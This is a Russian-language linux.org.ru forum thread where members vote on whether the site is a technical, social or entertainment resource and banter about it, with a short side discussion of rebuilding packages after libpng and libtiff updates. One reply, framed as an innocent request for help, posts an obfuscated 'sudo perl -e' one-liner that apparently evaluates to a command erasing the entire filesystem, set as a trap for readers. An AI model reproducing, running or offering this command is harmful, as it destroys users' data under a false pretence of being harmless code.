LINUX.ORG.RU
ФорумTalks

Что интересно пользователям ЛОР (LOR is ...)?


0

0

Последние дискуссии «демократии» протекают как-то странно. И с жертвами.

Поэтому вопрос к пользователям: что вам интересно на данном ресурсе, как вы вообще воспринимаете данный ресурс, и какие его части для вас более важны:

1. ЛОР это технический ресурс, и неважно, что тут за личности, пока сохраняется высокая квалификация инженеров, ресурс интересен, чтобы не творилось в непрофильных разделах, их можно и не читать.

2. ЛОР это технический ресурс, но вот мусор и глупость очень мешает его воспринимать именно так. Было бы чище, было бы намного лучше.

3. ЛОР это комлексный ресурс, где мои коллеги не только занимаются решением технических вопросов, но и отдыхают, приятно побыть в среде себе подобных, и поговорить совершенно обо всём.

4. ЛОР это развлекательный ресурс. Он прежде всего должен дарить веселье, в качестве технического помощника он не воспринимается, зато тут очень весело.

5. ЛОР это слив внешнего негатива, где можно писать абсолютно что угодно, и получать всегда одинаковую реакцию, хорошее средство снятия напряжения.

6. ЛОР это как вредная привычка, как надоевший муж, с которым прожито 50 лет, с дырками на трико и вечным перегаром, вроде и надоел до невозможности, но менять уже не хочется, ко всему уже привычно и не хочется переставлять закладки в браузере.

7. Свой вариант.

Можно несколько вариантов или даже на каждый вариант своё количество процентов назначить, типа 1 - 40%, 6 - 60%.

Строго 3. И де-факто это хорошо получается - есть техническая часть форума, есть толксы, есть новости как разновидность толксов.

aix27249
()

Не могу прочитать весь текст с утра! Запости вечером

bioreactor ★★★★★
()

Третий вариант мне ближе всего.

Hetor
()

>3. ЛОР это комлексный ресурс, где мои коллеги не только занимаются решением технических вопросов, но и отдыхают, приятно побыть в среде себе подобных, и поговорить совершенно обо всём.

Black_Shadow ★★★★★
()

определенно 3-й вариант...

Только жаль, что смешной ЛОР постепенно умирает (также как и securitylab), раньше что не тред, так ржач.

А на секлабе, можно было читать комменты не обращая внимания на новость - ржач был обеспечен. А сейчас там просто сборище троллей.

lexxus-lex ★★★
()

4. ЛОР полностью заменяет мне каналы НТВ и ТНТ.

shoewreck
()

Ув. jungleace, простите что не в тему, но не подскажите, что у меня вот в таком вот скрипте не работает?

sudo perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

Никак разобраться не могу.

NuclearPhoenix
()

Нечто среднее между 2 и 3. Если бы баланс адекватных людей и отмороженных троллей сместился в пользу первых - я был бы рад.

Axon ★★★★★
()

1. это технический ресурс, и мне совершенно не важны личности и прочие нарушения провал в большинстве случаев, разве что ну совсем ни в какие рамки не лезет. это в первую очередь. ну и да, иногда полезно и повеселиться в толксах (я в основном читаю только, иногда очень весело). побольше бы настоящих технических срачей, при это смешных!

val-amart ★★★★★
()

> 6. ЛОР это как вредная привычка, как надоевший муж, с которым прожито 50 лет, с дырками на трико и вечным перегаром, вроде и надоел до невозможности, но менять уже не хочется, ко всему уже привычно и не хочется переставлять закладки в браузере.

7. Майка-алкоголичка.


FIXED.

iZEN ★★★★★
()

3. ЛОР это комлексный ресурс, где мои коллеги не только занимаются решением технических вопросов, но и отдыхают, приятно побыть в среде себе подобных, и поговорить совершенно обо всём.

BSD
()

3. Больше нужен Talks, но спросить о чем либо тоже бывает нужно и ЛОР помогает

fae-rhan
()

Конечно 3.
Тут и на вопрос можно (не обязательно связанный с Линуксом) ответ получить и другим себе подобным помочь. И просто отдохнуть в кругу «коллег».

Nao ★★★★★
()

ЛОР - это прежде всего новости (при чем не только о linux и компьютерах). Ну и конечно же - это тролли, еда и тонны веселия.

petrosyan ★★★★★
()

Три.
И мне интересно всё, да.

Terrens
()
Ответ на: комментарий от px

Не просто 2и3,а что-то среднее между этим-в целом это технический ресурс,но и пообщаться неплохо,да мусора горы целые.

ratte
()
Ответ на: комментарий от ratte

>но и пообщаться неплохо,да мусора горы целые
Общение в контексте технеического ресурса это и есть мусор. Причем обсуждение последних политических событий или музыки это такой же мусор как и обсуждение жоп и сисек.

px ★★★
()

4. Я тут только ради толксов.

drull ★☆☆☆
()

новости и немножко (4)

ddos3
()

ЛОР - это единственный сайт в сети интернет. Есть еще юмористический сайт хабрахабр, когда-то давно существовал 2ч, но в сухом остатке только ЛОР...

simple_best_world_web_master
()
Ответ на: комментарий от jungleace

>как надоевший муж, с которым прожито 50 лет

Там где-то написано про девушку?


Я же говорю, что да. Видимо и не девушка даавно. Спалилась :)
Хотя ты видать уже не заметишь...

А так ближе к 3 варианту.

amorpher ★★★★★
()

Здесь можно получить ответы на затейливые технические вопросы, можно обсудить всё что угодно, а свободная атмосфера с оттенком неадекватности, позволяет чувствовать себя комфортно, в отличие от ресурсов типа линупсфорума и и иже с ними.

GotF ★★★★★
()

Фрейд был прав, только секс и насилие (ц)

DNA_Seq ★★☆☆☆
()

Раньше было 3 но сейчас скоре 6

DNA_Seq ★★☆☆☆
()
Ответ на: комментарий от madcore

а tiff до 4.0.0_beta5 ? ) тоже придется перекомпиливать много если старые библиотеки не сохранять

ps: я тоже пока с 1.2.x

Sylvia ★★★★★
()
Ответ на: комментарий от Sylvia

Обнволение tiff-а у меня как-то незаметно прошло, а вот новый libpng я пока замаскировал от греха подальше...

madcore ★★★★★
()
Ответ на: комментарий от madcore

djvu gimp imlib2 netpbm sane-backends evince wxGTK xsane cups qt-gui ghostscript-gpl kdegraphics-strigi-analyzer okular digikam

у меня вот получилось по tiff

libpng 1.4 вообще-то уже основная (давно) в Arch и даже в Slackware
можно наверное обновляться, вот только пакеты пересобирать лень, и смесь из старого и нового тоже держать не хочется.

Sylvia ★★★★★
()
Ответ на: комментарий от Sylvia

С тиффом это мелочи, а вот с пнг мне пол системы пересобирать, включая кеды. Но это пол беды, с ним пока не все собирается.

madcore ★★★★★
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.